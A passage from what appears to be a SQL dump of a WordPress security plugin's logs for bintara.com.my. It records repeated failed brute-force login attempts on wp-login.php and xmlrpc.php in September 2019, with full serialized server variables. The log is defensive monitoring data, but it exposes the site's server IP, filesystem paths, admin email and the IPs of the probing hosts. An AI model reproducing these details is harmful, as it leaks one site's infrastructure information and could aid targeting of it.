Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"142.93.91.62\";s:11:\"REMOTE_PORT\";s:5:\"49876\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYFJso75s89pqgR69SLUwQAAAZc\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568754098.3887\";s:12:\"REQUEST_TIME\";s:10:\"1568754098\";}}','notice','2019-09-17 21:01:39','2019-09-17 21:01:38',18255992,19555248,'https://bintara.com.my/xmlrpc.php',1,0,'142.93.91.62'),(24741,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"89\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"142.93.91.62\";s:11:\"REMOTE_PORT\";s:5:\"48478\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYFJqo75s89pqgR69SLUvwAAAYY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568754090.1404\";s:12:\"REQUEST_TIME\";s:10:\"1568754090\";}}','notice','2019-09-17 21:01:31','2019-09-17 21:01:30',17740168,19230264,'https://bintara.com.my/wp-login.php',1,0,'142.93.91.62'),(24384,0,'brute_force','invalid-login::username-[login]','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:7:\"[login]\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"475\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"119.28.180.62\";s:11:\"REMOTE_PORT\";s:5:\"49160\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYBdQ9K-omY048@iBsMrXgAAAMI\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568693571.3113\";s:12:\"REQUEST_TIME\";s:10:\"1568693571\";}}','notice','2019-09-17 04:12:52','2019-09-17 04:12:51',18255672,19555664,'https://bintara.com.my/xmlrpc.php',1,0,'119.28.180.62'),(24073,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"88\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"213.122.172.69\";s:11:\"REMOTE_PORT\";s:5:\"30881\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX9nqL1rBLb0GV3O7mTdtQAAAEQ\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568630696.7061\";s:12:\"REQUEST_TIME\";s:10:\"1568630696\";}}','notice','2019-09-16 10:44:58','2019-09-16 10:44:57',17736880,19228440,'https://bintara.com.my/wp-login.php',1,0,'213.122.172.69'),(24074,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"213.122.172.69\";s:11:\"REMOTE_PORT\";s:5:\"31807\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX9nq2CCaIOMm5l5jJE-kAAAAQE\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568630699.7815\";s:12:\"REQUEST_TIME\";s:10:\"1568630699\";}}','notice','2019-09-16 10:45:01','2019-09-16 10:45:00',18255696,19555464,'https://bintara.com.my/xmlrpc.php',1,0,'213.122.172.69'),(24075,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"81.177.174.10\";s:11:\"REMOTE_PORT\";s:5:\"32776\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX9pc3PgbK7GuRh1kKnCUwAAAJI\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568631155.5806\";s:12:\"REQUEST_TIME\";s:10:\"1568631155\";}}','notice','2019-09-16 10:52:36','2019-09-16 10:52:35',17739848,19230560,'https://bintara.com.my/wp-login.php',1,0,'81.177.174.10'),(24076,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"81.177.174.10\";s:11:\"REMOTE_PORT\";s:5:\"33708\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX9pdmf5CPZPc3WLyou97AAAAMk\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568631158.1984\";s:12:\"REQUEST_TIME\";s:10:\"1568631158\";}}','notice','2019-09-16 10:52:39','2019-09-16 10:52:38',18255576,19552856,'https://bintara.com.my/xmlrpc.php',1,0,'81.177.174.10'),(24077,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"94\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"149.202.204.104\";s:11:\"REMOTE_PORT\";s:5:\"35410\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX9rK2CCaIOMm5l5jJE-zAAAAQ8\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568631595.1513\";s:12:\"REQUEST_TIME\";s:10:\"1568631595\";}}','notice','2019-09-16 10:59:56','2019-09-16 10:59:55',17743344,19230904,'https://bintara.com.my/wp-login.php',1,0,'149.202.204.104'),(24078,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"94\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"149.202.204.104\";s:11:\"REMOTE_PORT\";s:5:\"35410\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX9rK2CCaIOMm5l5jJE-zAAAAQ8\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568631595.1513\";s:12:\"REQUEST_TIME\";s:10:\"1568631595\";}}','notice','2019-09-16 10:59:56','2019-09-16 10:59:55',17904896,19230904,'https://bintara.com.my/wp-login.php',1,0,'149.202.204.104'),(24079,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 